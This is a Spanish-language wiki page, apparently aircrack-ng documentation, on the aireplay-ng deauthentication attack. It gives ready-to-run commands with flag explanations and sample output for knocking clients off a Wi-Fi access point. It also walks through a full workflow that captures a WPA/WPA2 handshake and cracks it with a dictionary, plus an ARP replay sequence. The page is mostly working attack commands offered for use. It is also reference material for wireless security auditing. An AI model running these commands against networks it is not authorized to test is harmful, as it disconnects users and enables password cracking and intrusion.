Herramientas de usuario

Herramientas del sitio


es:deauthentication

Deautenticación

Descripción

Este ataque envia paquetes de desasociación a uno o más clientes que están actualmente asociados a un punto de acceso. Las razones por las que es útil desasociar clientes pueden ser:

  • Recuperar o desvelar un ESSID oculto. Este es un ESSID que no es divulgado o anunciado por el AP.
  • Capturar handshakes WPA/WPA2 forzando a los clientes a volverse a autenticar
  • Generar peticiones ARP (en Windows, algunas veces, los clientes borran su “ARP cache” cuando son desconectados)

Por supuesto, este ataque es totalmente inútil si no existen clientes wireless asociados.

Uso

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Donde:

  • -0 significa deautenticación
  • 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras); 0 significa enviarlas continumente
  • -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
  • -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a deautenticar; si se omite serán deautenticados todos los clientes
  • ath0 es el nombre de la interface

Ejemplos de uso

Deautenticación típica

Primero, es necesario averiguar si hay algún cliente actualmente conectado. Necesitaremos su dirección MAC para el siguiente comando:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Donde:

  • -0 significa deautenticación
  • 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras)
  • -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
  • -c 00:0F:B5:34:30:30 es la dirección MAC del cliente que queremos deautenticar
  • ath0 es el nombre de la interface

La salida será algo similar a esto:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

Captura del Handshake WPA/WPA2 con Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (y abrimos otra consola)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(esperamos algunos segundos)
aircrack-ng -w /path/to/dictionary out.cap

A continuación explicamos estos comandos:

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
Donde:

  • -c 6 es el número del canal
  • –bssid 00:14:6C:7E:40:80 limita los paquetes capturados únicamente a este punto de acceso
  • -w out es el nombre del archivo donde se guardarán las capturas
  • ath0 es el nombre de la interface

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Donde:

  • -0 significa ataque de deautenticación
  • 5 es el número de paquetes de deautenticación a enviar
  • -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
  • -c 00:0F:B5:AB:CB:9D es la dirección MAC del cliente que queremos deautenticar
  • ath0 es el nombre de la interface

A continuación puedes ver la salida del comando “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]

Generar peticiones ARP con una tarjeta Prism2

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (abrimos otra consola)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

Despues de enviar los 10 paquetes de deautenticación, comenzamos a escuchar para “pescar” algún “ARP requests” con el ataque 3. La opción -h es obligatoria y tiene que ser la dirección MAC de un cliente asociado.

Si estás usando el driver wlan-ng/, deberías ejecutar el script airmon-ng (a menos que sepas lo que estás haciendo) o sino la tarjeta no funcionará de forma correcta para poder inyectar.

Pistas de uso

Es más efectivo atacar a un cliente determinado usando la opción -c.

Los paquetes de deautenticación son enviados directamente desde el PC a los clientes. Por lo que se debe comprobar que estamos físicamente cerca de los clientes para que les lleguen los paquetes que enviamos desde nuestra tarjeta wireless. (En airodump-ng mirar el PWR de los clientes y no el del AP)

Problemas de uso

Ninguno por el momento.

es/deauthentication.txt · Última modificación: 2009/08/14 17:40 por mister_x